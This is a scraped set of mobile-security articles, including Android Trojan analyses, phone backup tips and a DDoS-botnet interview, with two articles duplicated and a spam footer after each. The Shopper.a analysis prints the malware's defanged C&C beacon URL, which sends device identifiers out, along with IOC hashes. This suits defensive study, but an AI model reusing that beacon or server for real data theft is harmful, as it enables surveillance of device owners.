Lukas Stefanko: How we fought off a DDoS attack from a mobile botnet – 10 minute mail

Hot on the heels of his research into an attack that attempted to take down ESET’s website, Lukas Stefanko sheds more light on threats posed by mobile botnets

In the course of fighting off a DDoS attack on ESET’s infrastructure, ESET researchers discovered a malicious mobile app used to make the flood of requests to its website. ESET Malware Researcher Lukas Stefanko analyzed the app and published his findings yesterday. We sat with him to ask a few follow-up questions.

The attack was conducted using a mobile app – is it a common vector for DDoS attacks?

On one hand, mobile-based DDoS attacks are quite rare. DDoS attacks are still typically launched via personal computers or servers. However, the times, they are changing. Mobile devices grow more powerful, their connectivity grows faster… If their share on the overall internet traffic, I mean in the consumer space, is set to surpass computers – we can’t expect the criminals to stay shy from using them for their attacks.

By the way, the capability to perform a DDoS attack is missing in the MITRE ATT&CK knowledge base of malicious mobile techniques. We’ve submitted it as a new technique because we think this threat will keep growing and that defenders should be aware of it.

The attack on our infrastructure serves as a good illustration: the criminals managed to reach over fifty thousand installs with their app, which is by no means a low number. However, in the past, there were numerous cases of mobile adware reaching millions of installs before being detected. This shows that it’s possible to quickly build a relatively strong botnet.

Criminals tend to follow some goals with their action. Do you have any clue what their goal was with that DDoS attack?

In short – no, we can only speculate. However, the only net effect of the attack was that they exposed their botnet, we reported the app they used and it has been taken down from the Play store and wiped from the users’ devices – those with the Google Protect feature turned on. Practically, this DDoS tool no longer exists.

So, game over?

Well… with a few caveats, yes.

The app may have been downloaded also from unofficial app stores and there are no means for wiping those installs from the infected devices. Also, the app may be still lurking at some places outside the Play store. However, we haven’t seen any such distribution mechanism, so, in my opinion, this is not a real threat.

Besides that, the website that acts as C&C server is still functional. However, without a significant number of infected devices, the website is useless.

How come no security mechanism detected the app prior to it being listed onto the official Android store?

Look, the diversity of apps is beyond imagination. The number of features is high, and their combinations are endless. Despite this, the apps that are outright malicious get caught, with rare exceptions. In this particular case, the app that was, ultimately, used for the attack, is not malicious per se. It is capable of contacting a defined website and loading a script from it – a feature which is quite standard in many apps. And it’s the script what makes the app malicious.

Probably, all the apps that have the functionality of downloading anything should be examined taking the downloaded content into account…

Unfortunately, it’s not that simple. Keep in mind that what the app downloads may be changed at any moment…

Does this mean that there is no viable way to prevent this type of malicious app from sneaking into the Store?

Well, while I’m not going to disclose any details, we’ve improved our detection systems. So, based on this experience, chances are that we will be able to flag similar Trojans to Google.

Given the fact that safeguarding an app store can never be bulletproof – seems that there is a need for additional protections at the endpoint level…

This is nothing new, nor is it limited to any particular platform. With the ever-growing variability and sophistication of attacks, you can never rely on a single layer of protection. Ideally, you should defend yourself at every point of the attack chain – starting with securing the source, all the way through post-execution stages, should the malware reach them.

I’d like to stress that, based on what we have learned by analyzing this attack, we have improved our detection mechanisms, including our machine learning-based detections.

So similar malicious apps should be prevented from sneaking to devices protected by ESET’s mobile security solution?

In principle, yes. Our users should be safe from this threat. However, the improvements I mentioned relate mostly to post-processing protective technologies – which means the threat might make it onto the device.

After the malware gets processed by our backend system and the newly created detections are pushed onto the protected devices, the malicious app would be detected and flagged to the user.



Editor


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Have you backed up your smartphone lately? – 10 minute mail

With World Backup Day upon us, we walk you through the ways to back up your iPhone or Android phone so that your personal information remains safe

In your pocket, you carry a supercomputer that outperforms all the tech that landed Aldrin and Armstrong on the moon. Although you may have heard this claim before, it probably never really resonated with you. Now, if we rephrase that to “you carry a device in your pocket that stores almost every aspect of your life, from memories in the form of photographs to personal notes, reminders, passwords and all kinds of sensitive data”, suddenly it feels a bit more personal.

What if your phone gets locked up by a ransomware attack, stolen, bricked or even destroyed? Would you lose everything on it, or do you back it up regularly?

If you don’t back up your phone regularly, then you should start right now. And since we are celebrating World Backup Day today, we’re going to walk you through the ways to do it on both iOS and Android-powered devices.

Backing up your iOS device

When backing up your iPhone, or any other device running iOS, you have two main options to choose from. The first option is storing a backup of your device on your computer or on removable storage connected to it. If you are running macOS Mojave or an earlier version or Windows, the process is the same and uses iTunes. First of all, you’ll have to install Apple’s iTunes software onto your computer, since you will not be able to manage your device without it (Macs have it installed by default). If you’re running macOS Catalina, then instead of iTunes you’ll find the option in the Finder.

To start the process, connect your device to your computer, using the lightning cable you usually use to charge your device.

You will get a prompt to unlock your device, using your preferred method (FaceID, TouchID, code). You may also be prompted to choose to Trust This Computer so your device can sync with it without a problem.

You then click on your device in iTunes or in Finder depending on your operating system and proceed with the whole process. For an extra layer of security, you can choose to encrypt the backup that will be locally stored on your computer. Now just click on the Back Up Now button and you’re set to go. While you’re at it you can also choose to back up your most important data to your iCloud.

This leads us to the other available option, and that is backing up your iPhone to your iCloud straight from your device. Go to the settings on your device and tap on your name and then tap on the iCloud button. Now toggle the iCloud Backup button to turn it on and then press the Back Up Now option.

While backing up you should be connected to a trusted Wi-Fi network. You can set up your iPhone to automatically back up your device to iCloud when you’re connected to a Wi-Fi network. Depending on the storage space that you have on your iCloud, with the default being 5GB, you can also toggle the apps that store data on it.

For example, photos can be quite taxing since, depending on their quality, their size can range from approximately 1 MB to 10 MB, or even 100 MB if we’re talking about videos. So, you might need either to expand your storage or alternatively to move the media files to another repository.

RELATED READING: Types of backup and five backup mistakes to avoid

Backing up your Android device

Now, Androids are a different beast in that you don’t really need any software suite installed on your computer to manage your Android device or its storage. To back up your photos and media onto your computer, all you have to do is plug it into your computer using a USB cable.

The phone will then ask you if you will allow your computer to access your phone data, which you will agree to. Your phone will then appear in your File Explorer (Windows) or Finder (macOS) and you can browse through the files on your device and copy them or drag and drop them into the folder of your choice.

To put it in simple terms: your Android device basically functions as an external storage device such as a USB or an external drive. Although it’s worth mentioning that some manufacturers do have software, such as Samsung’s DeX, but you don’t necessarily have to use it.

As with iOS devices though, there is another option – you can back up your data to the cloud. Backup options here vary from brand to brand, with many offering their own take on how to store your data; to make this a bit simpler, we’re going to stick to Google’s version since it should be available across most Android devices.

The most straightforward route is going to the settings, then scrolling down until you find Google Settings. Once you’ve tapped on that button, it should redirect you to the Google Settings menu, where you’ll find the Backup option (which may have slightly different names on different versions of the OS).

You can toggle the Backup option on and then press the Back up now button, which will back up your data to Google Drive. There’s also a separate option to back up your photos and videos to the Google Photo app.

And always remember…

Regardless of which kind of device you have, the best practice is to have multiple backups of your data so that in case you lose your phone or one of your backups gets corrupted, you’ll have an extra one to fall back on. Never underestimate the value of planning ahead, since it can save you from a migraine later on.



Amer Owaida


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

What to do you if your phone is lost or stolen – 10 minute mail

Losing your smartphone can be expensive, but the cost of the device may not be the final price you’ll be paying

According to a Prey study of 2018 reports from its customers of lost mobile devices, 69% are misplaced and 31% are stolen in various ways. Since smartphones have become a centerpiece of our digital identities, where we check our emails, stay connected on our social media, use them as our diaries, and pay with them, it is especially unnerving if we lose them. Your phone holds a virtual truckload of sensitive personal information that can exploited for a host of nefarious actions should it fall into the wrong hands.

Securing your device starts well before it is stolen or misplaced, so what steps should you take before and after your phone goes missing?

Back up your phone, store the data somewhere safe

This step should be a no-brainer but if you haven’t gotten around to it yet, then you should do it as soon as possible, like: now. There are multiple ways to go about it, and we looked at backup options for smartphones in greater detail last week.

In a nutshell, you can save a local backup file that includes all the bare necessities, such as contacts, messages, and photos on your computer. Doing that once a month will probably save from a headache, in the long run.

Alternatively, you can enable the auto-backup feature on your phone that will regularly back up your data onto the cloud, or you can back up your files to the cloud manually. To be safe: the best way is to do both and make multiple copies; in case your computer fails you or your files get wiped. The cloud option is also convenient since if your phone is stolen, you can easily set up a new phone using your stored data.

Lock it up like Fort Knox

Nowadays, smartphones offer myriad ways to lock them down tight. The best option is to go with a combination of a strong passcode and a biometric lock, such as a fingerprint.

Biometrics add an extra layer of security, which is always helpful. As for the passcode itself, don’t just go with the default option: make it more complex. Some systems allow you to increase the length of the passcode, while some give you the option to choose an alphanumeric code. The more complicated the password, the harder it is for a thief to break it.

Find my phone

Depending on your phone brand or system you’re running, it almost certainly has a “find my phone” option installed on it. iPhones have the oddly named Find My app, Samsungs have Find My Mobile and Androids in general have Find My Device. All of them have to be enabled to work, of course, so if you haven’t done it yet, you know the drill. Regardless of the brand you’re using, we can’t stress this enough: you should have this option turned on. It not only helps you find your device, but the app usually has multiple security features included as well.

You can log into the associated service through a browser and use the features from the menu. If you just misplaced the phone, you can choose the ring option. This will make the phone emit a sound, so you can hear it if you’re in the vicinity. If you haven’t properly secured your device, you can do that as well as display a message on the lock screen to a good Samaritan willing to return the phone.

RELATED READING: 20 tips for 2020: Be smarter with your smartphone

Finally, you have the nuclear option of erasing your phone remotely. If you do that, you might not be able to track your phone any longer, so only use this option as a final resort. You will lose your phone, but at least your data will remain private and nobody with malicious intent can exploit it. Reputable security software, too, often includes lock, locate and remote-wipe functionalities.

If you’re certain that you’ll never see your device again, you should contact your carrier and report that your phone has been lost or stolen, they will deactivate your SIM card, so it won’t be misused. If your phone is insured, you can also file an insurance claim and hopefully that will cover at least some of your losses.

Be prepared

Planning ahead can save you from a lot of headaches in the event you do misplace your device. To sum it up – secure your phone, back up all the data, and set up the ‘find my phone’ feature. Should your device be stolen or lost, you can at least be certain that you’ve done everything possible to secure it and facilitate its return.



Amer Owaida


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Cookiethief: a cookie-stealing Trojan for Android – 10 minute mail

We recently discovered a new strain of Android malware. The Trojan (detected as: Trojan-Spy.AndroidOS.Cookiethief) turned out to be quite simple. Its main task was to acquire root rights on the victim device, and transfer cookies used by the browser and Facebook app to the cybercriminals’ server. This abuse technique is possible not because of a vulnerability in Facebook app or browser itself. Malware could steal cookie files of any website from other apps in the same way and achieve similar results.

How can stealing cookies be dangerous? Besides various settings, web services use them to store on the device a unique session ID that can identify the user without a password and login. This way, a cybercriminal armed with a cookie can pass himself off as the unsuspecting victim and use the latter’s account for personal gain.

Package name of the Cookiethief malware — com.lob.roblox, which is similar to that of the Roblox Android gaming client (com.roblox.client), but has nothing in common with Roblox.

Malicious features of Trojan-Spy.AndroidOS.Cookiethief

To execute superuser commands, the malware connects to a backdoor installed on the same smartphone…

…and passes it a shell command for execution.

The backdoor Bood, located at the path /system/bin/.bood, launches the local server…

…and executes commands received from Cookiethief.

On the C&C server we also found a page advertising services for distributing spam on social networks and messengers, so it was not difficult to guess the motive behind the cookie-theft operation.

But there’s still a hurdle for the spammers that prevents them from gaining instant access to accounts just like that. For example, if Facebook detects an atypical user activity, the account may be blocked.

However, during our analysis of Cookiethief, we uncovered another malicious app with a very similar coding style and the same C&C server. The second “product” from (presumably) the same developers (detected as: Trojan-Proxy.AndroidOS.Youzicheng) runs a proxy on the victim’s device.

We believe that Youzicheng is tasked with bypassing the security systems of the relevant messenger or social network using a proxy server on the victim’s device. As a result, cybercriminals’ request to the website will look like a request from a legitimate account and not arouse suspicion.

To implement this method, an executable file is first downloaded.

Then the proxy configuration is requested.

The downloaded file is then run.

By combining these two attacks, cybercriminals can gain complete control over the victim’s account and not raise a suspicion from Facebook. These threats are only just starting to spread, and the number of victims, according to our data, does not exceed 1000, but the figure is growing.

Through the C&C server addresses and encryption keys used, Cookiethief can be linked with such widespread Trojans as Sivu, Triada, and Ztorg. Usually, such malware is either planted in the device firmware before purchase, or it gets into system folders through vulnerabilities in the operating system and then can download various applications into the system. As a result, a persistent backdoor like Bood, along with the auxiliary programs Cookiethief and Youzicheng, can end up on the device.

We detect com.lob.roblox as HEUR:Trojan-Spy.AndroidOS.Cookiethief, org.rabbit as HEUR:Trojan-Proxy.AndroidOS.Youzicheng, and Bood as HEUR:Backdoor.AndroidOS.Bood.a.

IOCs

 


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Cookiethief: a cookie-stealing Trojan for Android – 10 minute mail

We recently discovered a new strain of Android malware. The Trojan (detected as: Trojan-Spy.AndroidOS.Cookiethief) turned out to be quite simple. Its main task was to acquire root rights on the victim device, and transfer cookies used by the browser and Facebook app to the cybercriminals’ server. The exact means by which the Trojan was able to infect certain Android devices is not clear; however, it was not due to a vulnerability in the Facebook application or browser itself.

How can stealing cookies be dangerous? Besides various settings, web services use them to store on the device a unique session ID that can identify the user without a password and login. This way, a cybercriminal armed with a cookie can pass himself off as the unsuspecting victim and use the latter’s account for personal gain.

Package name of the Cookiethief malware — com.lob.roblox, which is similar to that of the Roblox Android gaming client (com.roblox.client), but has nothing in common with Roblox.

Malicious features of Trojan-Spy.AndroidOS.Cookiethief

To execute superuser commands, the malware connects to a backdoor installed on the same smartphone…

…and passes it a shell command for execution.

The backdoor Bood, located at the path /system/bin/.bood, launches the local server…

…and executes commands received from Cookiethief.

On the C&C server we also found a page advertising services for distributing spam on social networks and messengers, so it was not difficult to guess the motive behind the cookie-theft operation.

But there’s still a hurdle for the spammers that prevents them from gaining instant access to accounts just like that. For example, if Facebook detects an atypical user activity, the account may be blocked.

However, during our analysis of Cookiethief, we uncovered another malicious app with a very similar coding style and the same C&C server. The second “product” from (presumably) the same developers (detected as: Trojan-Proxy.AndroidOS.Youzicheng) runs a proxy on the victim’s device.

We believe that Youzicheng is tasked with bypassing the security systems of the relevant messenger or social network using a proxy server on the victim’s device. As a result, cybercriminals’ request to the website will look like a request from a legitimate account and not arouse suspicion.

To implement this method, an executable file is first downloaded.

Then the proxy configuration is requested.

The downloaded file is then run.

By combining these two attacks, cybercriminals can gain complete control over the victim’s account and not raise a suspicion from Facebook. These threats are only just starting to spread, and the number of victims, according to our data, does not exceed 1000, but the figure is growing.

Through the C&C server addresses and encryption keys used, Cookiethief can be linked with such widespread Trojans as Sivu, Triada, and Ztorg. Usually, such malware is either planted in the device firmware before purchase, or it gets into system folders through vulnerabilities in the operating system and then can download various applications into the system. As a result, a persistent backdoor like Bood, along with the auxiliary programs Cookiethief and Youzicheng, can end up on the device.

We detect com.lob.roblox as HEUR:Trojan-Spy.AndroidOS.Cookiethief, org.rabbit as HEUR:Trojan-Proxy.AndroidOS.Youzicheng, and Bood as HEUR:Backdoor.AndroidOS.Bood.a.

IOCs

 


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Smartphone shopaholic | Securelist – 10 minute mail

Have you ever noticed strange reviews of Google Play apps that look totally out of place? Their creators might give it five stars, while dozens of users rate it with just one, and in some cases the reviews seem to be talking about some other program entirely.

If so, you may be unknowingly acquainted with the work of Trojan-Dropper.AndroidOS.Shopper.a.

How Shopper.a works

Cybercriminals use Trojan-Dropper.AndroidOS.Shopper.a to boost certain app’s rating and increase the number of installations and registrations. All this can be used, among other things, to dupe advertisers. What’s more, the Trojan can display advertising messages on the infected device, create shortcuts to ad sites, and perform other actions.

Back to the suspicious reviews, Trojan-Dropper.AndroidOS.Shopper.a. can open Google Play (or another app store), install several programs, and write fake user reviews of them. To make user not notice anything untoward, the installation window is concealed by the app’s “invisible” window. The lack of installation rights from third-party sources is no obstacle to the Trojan — it gives itself the requisite permissions through AccessibilityService. This service is intended by Google to facilitate the use of smartphones for people with disabilities, but in the hands of cybercriminals it poses a serious threat to device owners. With permission to use it, the malware has almost limitless possibilities for interacting with the system interface and apps. For instance, it can intercept data displayed on the screen, click buttons, and emulate user gestures.

Masked as a system app, the malware misleads the user by using the system icon and the name ConfigAPKs. Our eye was caught by the app’s heavy obfuscation and suspicious use of AccessibilityService.

Distribution of Trojan-Dropper.AndroidOS.Shopper.a, October – November 2019

Trojan-Dropper.AndroidOS.Shopper.a was most widespread in Russia, where the largest share of infected users (28.46%) was recorded in October – November 2019. Second place went to Brazil (18.70%) and third to India (14.23%).

Technical details

At startup, after the screen is unlocked, the app decrypts and downloads the payload.

Then the Trojan collects information about victim’s device (country, network type, vendor, smartphone model, email address, IMEI, IMSI), and forwards it to the cybercriminal server at:

http://api.adsnative123[.]com/search.php?sid=1001&sdk_v=A1.5.0&geo=PK&network=WIFI&time=1567059364545&lang=en&udid=dc9c9a616665e073&unkown=true&pname=com.cleaner.qefey.kslr&size=800_561&osv=4.4.2&gaid=6fa818cc-7a9d-4e4d-a6c9-69179c3c2490&anum=8&s_udid=&native=2&key=…

In response, it receives a set of commands:

Depending on the commands, Shopper.a can:

  • Open links received from the remote server in an invisible window (whereby the malware verifies that the user is connected to a mobile network).
  • After a certain number of screen unlocks, hide itself from the apps menu.
  • Check the availability of AccessibilityService rights and, if not granted, periodically issue a phishing request to the user to provide them.
  • Disable Google Play Protect.
  • Create shortcuts to advertised sites in the apps menu.
  • Download apps from the third-party “market” Apkpure[.]com and install them.
  • Open advertised apps on Google Play and “click” to install them.
  • Replace shortcuts to installed apps with shortcuts to advertised sites.
  • Post fake reviews supposedly from the Google Play user.
  • Show ads when the screen is unlocked.
  • Register users through their Google or Facebook accounts in a number of legitimate apps (such as in travel, retail, utilities and media categories) including the following apps:

Disclaimer: The malware described above does not exploit any vulnerabilities in legitimate apps that it downloads and registers users. The application only abuses Google Accessibility Service.

Conclusion

As noted above, one of the things that drew our attention was the use of AccessibilityService. This service is usually accessed by people with vision problems to facilitate smartphone use, such as having the names of app controls, web page content, etc., read out automatically. In other cases, it can be used to emulate on the app screen physical smartphone keys that have stopped working. If access is requested by a program whose functionality does not require AccessibilityService, be wary. And the best option is not to install apps from dubious sources at all, including from ads, whatever they promise. Even if the only danger posed by such apps comes from automatically written reviews, there is no guarantee that its creators will not change the payload at some later date. In any event, it’s worth getting hold of a mobile security solution that can independently detect and block dangerous apps.

IOCs

MD5

  • 0a421b0857cfe4d0066246cb87d8768c
  • 0b54b822683a70b9d4a3af08a2d506b2
  • 0b682e9cae5b8623fc3e62048623dcdb
  • 0ea057c5294a6cbfeffd2e91ae945981
  • 0eb70afbb011916facf075f80cc07605
  • 1a6d60b97fdeb29afc0bd16fcaa92d3a
  • 1e82c197037ff0e21ccbc8c6161144c8
  • 1e937712ca84a6364226a35e2fd9a550
  • 1f13ba11ceba8ddb6e0faf61e6d8da23
  • 2d234accdc400c892657b8568e217593
  • 2d755050c896aed9701aa78a3668bf72
  • 3a5ed5f6ecaa71f5c7b7447c1f451144
  • 3ad3f270aef9f56d9117f711a3783a4a
  • 3b1a2420c4afc019a19481a6f4282894
  • 3c312fbb18e7822f87334a9366baf9fc
  • 3cadeea4dedaf7d7db8b84d52cd6caea
  • 03ccb6adbe12daef1b40f7a6d7d26dbc
  • 3dc6538239e90e51233789c5876ccb71
  • 3fe0e78d451bb8389f1d8cb5009c3452
  • 4a3099f300741123e3c18b3a6d587ed8
  • 4e44fb07073ea46390ea94ce26d7d737
  • 5bbc06fc3058b76ee09d3cce608ebdda
  • 5c316045836c4b4110552cc80af2fe75
  • 5e313e5e4e37e87633ea342a24c27534
  • 6ec7e5334f8b11499c150ba28f06e78c
  • 7a0d40f3598a91fc1206b3b2bdd49c2c
  • 7c68eb0bd93d8cf27539d2ff7da5bb15

C&C

http://api.adsnative123[.]com


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Over 600 Million Users Download 25 ‘Fleeceware’ Apps from the Play Store – Disposable mail news

Researchers at security firm Sophos has discovered a new set of Android apps present on the Google Play Store that contain fleeceware. Notably, these apps have been downloaded and installed by over 600 million unsuspecting Android users.

The term ‘Fleeceware’ was first coined in September 2019 by cybersecurity firm Sophos in aftermath of an investigation that led to a new kind of financial fraud on the authentic Google Play Store.

Fleeceware is a new addition to the cybersecurity ecosystem, referring to the exploitation of the trial period mechanism in Android apps which generally is provided before one is charged for the full version from his signed up account.

Normally, users who register for an Android app’s trial period are required to cancel the same manually in order to avoid being charged. However, it’s common among users to simply stop using the app by uninstalling it in case they don’t like it. The action of uninstalling is read by the developers as trial period being canceled and hence it doesn’t result in the due amount being charged from the user account.

The UK based, a cybersecurity company, Sophos told that it identified over two-dozen android apps containing fleeceware, these apps were charging somewhere around $100 and $240 per year for apps as basic and mainstream as barcode readers, calculators, and QR scanners.

Suspecting the unusually high number of downloads on these apps, analyst Jagadeesh Chandraiah says, it’s likely that these apps have resorted to third-party pay-per-install services to raise up the download counts. He also suspects the five-star reviews being fake and bought in order to better the apps ranking on the Play store and hence lure a large number of users.

Warning the users in their report, Sophos told, “If you have an Android device and use the Google Play Store for apps, you should rigorously avoid installing these types of “free trial” apps that offer subscription-based charges after a short trial.”

“If you do happen to have a free trial, make sure you understand that merely uninstalling the app does not cancel the trial period. Some publishers require you to send a specific email or follow other complicated instructions to end the free trial before you are charged, though you might just need to log into your Google Pay to cancel. Keep copies of all correspondence with the publisher, and be prepared to share that with Google if you end up disputing the charges.” the report further read.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Smartphone shopaholic | Securelist – 10 minute mail

Have you ever noticed strange reviews of Google Play apps that look totally out of place? Their creators might give it five stars, while dozens of users rate it with just one, and in some cases the reviews seem to be talking about some other program entirely.

If so, you may be unknowingly acquainted with the work of Trojan-Dropper.AndroidOS.Shopper.a.

How Shopper.a works

Cybercriminals use Trojan-Dropper.AndroidOS.Shopper.a to boost certain app’s rating and increase the number of installations and registrations. All this can be used, among other things, to dupe advertisers. What’s more, the Trojan can display advertising messages on the infected device, create shortcuts to ad sites, and perform other actions.

Back to the suspicious reviews, Trojan-Dropper.AndroidOS.Shopper.a. can open Google Play (or another app store), install several programs, and write fake user reviews of them. To make user not notice anything untoward, the installation window is concealed by the app’s “invisible” window. The lack of installation rights from third-party sources is no obstacle to the Trojan — it gives itself the requisite permissions through AccessibilityService. This service is intended by Google to facilitate the use of smartphones for people with disabilities, but in the hands of cybercriminals it poses a serious threat to device owners. With permission to use it, the malware has almost limitless possibilities for interacting with the system interface and apps. For instance, it can intercept data displayed on the screen, click buttons, and emulate user gestures.

Masked as a system app, the malware misleads the user by using the system icon and the name ConfigAPKs. Our eye was caught by the app’s heavy obfuscation and suspicious use of AccessibilityService.

Distribution of Trojan-Dropper.AndroidOS.Shopper.a, October – November 2019

Trojan-Dropper.AndroidOS.Shopper.a was most widespread in Russia, where the largest share of infected users (28.46%) was recorded in October – November 2019. Second place went to Brazil (18.70%) and third to India (14.23%).

Technical details

At startup, after the screen is unlocked, the app decrypts and downloads the payload.

Then the Trojan collects information about victim’s device (country, network type, vendor, smartphone model, email address, IMEI, IMSI), and forwards it to the cybercriminal server at:

http://api.adsnative123[.]com/search.php?sid=1001&sdk_v=A1.5.0&geo=PK&network=WIFI&time=1567059364545&lang=en&udid=dc9c9a616665e073&unkown=true&pname=com.cleaner.qefey.kslr&size=800_561&osv=4.4.2&gaid=6fa818cc-7a9d-4e4d-a6c9-69179c3c2490&anum=8&s_udid=&native=2&key=…

In response, it receives a set of commands:

Depending on the commands, Shopper.a can:

  • Open links received from the remote server in an invisible window (whereby the malware verifies that the user is connected to a mobile network).
  • After a certain number of screen unlocks, hide itself from the apps menu.
  • Check the availability of AccessibilityService rights and, if not granted, periodically issue a phishing request to the user to provide them.
  • Disable Google Play Protect.
  • Create shortcuts to advertised sites in the apps menu.
  • Download apps from the third-party “market” Apkpure[.]com and install them.
  • Open advertised apps on Google Play and “click” to install them.
  • Replace shortcuts to installed apps with shortcuts to advertised sites.
  • Post fake reviews supposedly from the Google Play user.
  • Show ads when the screen is unlocked.
  • Register users through their Google or Facebook accounts in the following apps:

Conclusion

As noted above, one of the things that drew our attention was the use of AccessibilityService. This service is usually accessed by people with vision problems to facilitate smartphone use, such as having the names of app controls, web page content, etc., read out automatically. In other cases, it can be used to emulate on the app screen physical smartphone keys that have stopped working. If access is requested by a program whose functionality does not require AccessibilityService, be wary. And the best option is not to install apps from dubious sources at all, including from ads, whatever they promise. Even if the only danger posed by such apps comes from automatically written reviews, there is no guarantee that its creators will not change the payload at some later date. In any event, it’s worth getting hold of a mobile security solution that can independently detect and block dangerous apps.

IOCs

MD5

  • 0a421b0857cfe4d0066246cb87d8768c
  • 0b54b822683a70b9d4a3af08a2d506b2
  • 0b682e9cae5b8623fc3e62048623dcdb
  • 0ea057c5294a6cbfeffd2e91ae945981
  • 0eb70afbb011916facf075f80cc07605
  • 1a6d60b97fdeb29afc0bd16fcaa92d3a
  • 1e82c197037ff0e21ccbc8c6161144c8
  • 1e937712ca84a6364226a35e2fd9a550
  • 1f13ba11ceba8ddb6e0faf61e6d8da23
  • 2d234accdc400c892657b8568e217593
  • 2d755050c896aed9701aa78a3668bf72
  • 3a5ed5f6ecaa71f5c7b7447c1f451144
  • 3ad3f270aef9f56d9117f711a3783a4a
  • 3b1a2420c4afc019a19481a6f4282894
  • 3c312fbb18e7822f87334a9366baf9fc
  • 3cadeea4dedaf7d7db8b84d52cd6caea
  • 03ccb6adbe12daef1b40f7a6d7d26dbc
  • 3dc6538239e90e51233789c5876ccb71
  • 3fe0e78d451bb8389f1d8cb5009c3452
  • 4a3099f300741123e3c18b3a6d587ed8
  • 4e44fb07073ea46390ea94ce26d7d737
  • 5bbc06fc3058b76ee09d3cce608ebdda
  • 5c316045836c4b4110552cc80af2fe75
  • 5e313e5e4e37e87633ea342a24c27534
  • 6ec7e5334f8b11499c150ba28f06e78c
  • 7a0d40f3598a91fc1206b3b2bdd49c2c
  • 7c68eb0bd93d8cf27539d2ff7da5bb15

C&C

http://api.adsnative123[.]com


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

5G technology predictions 2020 | Securelist – 10 minute mail

It is estimated that data will reach 175 zettabytes worldwide by 2025, up from 1.2 zettabytes in 2010, when 4G was first being deployed globally. 5G is known as the fifth generation cellular network technology. It is expected to be as much as 100 times faster than the present 4G systems, with up to 25 times lower latency or lag time, and as many as one million devices supported within one square kilometer. The foundation of 5G can be summarized in five technologies: millimeter waves, small cell networks, massive MIMO (multiple input multiple output), beamforming, and bytes full duplex.

With the dramatic increase in the amount and transfer speed of connected devices comes a natural expansion and amplification of the threats. The evolution, development and connectivity of numerous systems within 5G opens the door to numerous threats, which can be summarized as follows.

Vulnerabilities of telco services and infrastructure

As 5G innovations spread, more shortcomings and imperfections will show up in 5G gear, customer frameworks and administration by authorities. This could enable an attacker to damage or bring down a telco infrastructure, spy on its clients or divert its traffic. Governments need to set up nationwide capabilities to utilize objective and specialized confirmation techniques to evaluate both 5G adopters and suppliers, to discover faults and stipulate fixes.

User safety and privacy concerns

On the privacy side, matters become more complex. The advent of 5G with its short range will definitely mean more cell communication towers being deployed into commercial centers and buildings. With the right toolset, someone could collect and track the precise location of users. Another issue is that 5G service providers will have extensive access to large amounts of data being sent by user devices, which could show exactly what is happening inside a user’s home and at the very least describe via metadata their living environment, in-house sensors and parameters. Such data could expose a user’s privacy or could be manipulated and misused. Service providers may also consider selling such data to other service companies such as advertisers in an attempt to open up new revenue streams. In some cases, vulnerabilities could cause injuries or ill health, for instance, if a client’s therapeutic gadgets are disconnected and not operational. The potential threats will be even greater when critical infrastructure components such as water and energy equipment are put at risk.

Critical infrastructure expansion and risks

5G will assist in spreading communication to a larger number of geographical areas than at present. It will also equip non-networkable gadgets with remote monitoring and control. However, increasing numbers of connected systems like this will no longer be non-critical infrastructure, expanding our exposure to risk. People are being enticed to adopt convenience and non-stop communications, but the related threats could pose public safety risks.

Action plan

5G is going to have a revolutionary impact on telecommunications because, in addition to the technology itself, it is going to become a basis for other technologies and inventions, giving way to technological advances, particularly in the fields of smart cities, intelligent power grids and defense facilities. It is the next generation of cellular network using the existing 4G LTE in addition to opening up millimeter wave band. 5G will be able to welcome more network-connected devices and considerably increase speeds for all users.

However, as with every major technology, especially while it is evolving, 5G is likely to draw the attention of threat actors looking for opportunities to attack it. We may, for instance, see large-scale DDoS attacks, or challenges in terms of protecting a sophisticated network of connected devices whereby the compromise of one device can lead to a whole network crashing. In addition, 5G is developing technology on top of the previous infrastructure, which means it will inherit the vulnerabilities and misconfigurations of its predecessor.

Furthermore, the communication trust model will not be identical to previous cellular generations. IoT and M2M devices are expected to occupy a greater portion of the network capacity. The interaction of all these devices in the 5G network will likely trigger unprecedented issues in product design and device behavior. Given these fears and the political challenges, encouraging a zero-trust network model and strict product quality compliance would help build trust between the technology adopters and providers.

Government and industry leaders should join forces to promote secure and safe 5G technology projects to enhance the services and quality of life for citizens of smart cities. Furthermore, the communication trust model will be different from previous cellular generations.

IoT and M2M devices are expected to occupy the 5G network bandwidth, and the interlinkage of all these devices in the 5G network will reveal previously unknown problems in the design and behavior of 5G. With regards to such worries and the additional political disputes, adopting a zero-trust network model and strict quality assessment along with compliance would help shape the relationship between the technology adopters and providers.

Hi-tech vendor and governmental structures should join forces to prevent the exploitation of 5G by threat actors and preserve its innovative features for technical progress and improving the quality of living conditions.


